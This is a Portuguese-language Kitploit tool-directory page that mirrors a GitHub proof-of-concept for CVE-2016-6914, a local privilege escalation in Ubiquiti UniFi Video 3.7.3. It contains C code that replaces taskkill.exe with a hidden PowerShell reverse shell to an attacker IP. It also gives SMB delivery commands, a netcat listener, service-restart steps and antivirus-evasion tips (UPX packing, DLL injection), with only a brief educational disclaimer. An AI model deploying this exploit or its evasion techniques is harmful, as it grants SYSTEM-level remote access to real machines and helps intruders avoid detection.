Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
Ferramentas/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
Privilege EscalationExploitationPenetration TestingLearning & EducationPayload DevelopmentBinary Exploitation
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

🔥 Visão Geral

Este repositório contém uma prova de conceito (PoC) para CVE-2016-6914, uma vulnerabilidade de Elevação Local de Privilégio (LPE) que afeta Ubiquiti UniFi Video 3.7.3.

Um atacante com privilégios baixos pode substituir um binário confiável (taskkill.exe) dentro de C:\ProgramData\unifi-video\ para executar código malicioso com privilégios de SYSTEM.


⚡ Exploração

Passos para Exploração

1️⃣ Substitua taskkill.exe por um payload malicioso (exploit.exe).
2️⃣ Aguarde o UniFi Video Service ser executado ou reinicie-o manualmente.
3️⃣ O payload malicioso é executado, fornecendo um shell SYSTEM.


🚀 Payloads Incluídos

  • ✅ Reverse Shell em PowerShell
  • ✅ Reverse Shell em Netcat
  • ✅ Técnicas de Bypass de AV

📜 Código do PoC (Reverse Shell em PowerShell)

Este payload substitui taskkill.exe e lança um reverse shell.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}

✅ Compile usando MinGW: x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

🛠️ Instruções de Uso

1️⃣ Configure um Compartilhamento SMB (para Entrega Remota de Arquivos) No Kali, execute: impacket-smbserver share . -smb2support

2️⃣ Inicie um Listener Netcat nc -lvnp 4444

3️⃣ Entregue o Payload na Máquina Alvo Execute os seguintes comandos PowerShell no sistema alvo: copy \10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe stop-service UnifiVideoService -Force start-service UnifiVideoService

4️⃣ Obtenha um Shell SYSTEM Uma vez executado, um shell SYSTEM é aberto no seu listener!

🛡️ Contornando Antivírus (AV)

Para evitar a detecção básica de AV, tente: ✔️ Empacotar o Executável (UPX): upx --best --lzma exploit.exe ✔️ Usar Syscalls Alternativos em vez de system(). ✔️ Incorporar em Processos Legítimos usando Injeção de DLL.

⚠️ Aviso Legal

📢 Este PoC é apenas para fins educacionais! 🛑 O uso não autorizado é ilegal e passível de punição. 👨‍💻 Use-o apenas de forma legal e ética.

Referência:https://www.exploit-db.com/exploits/43390

Baixar ferramenta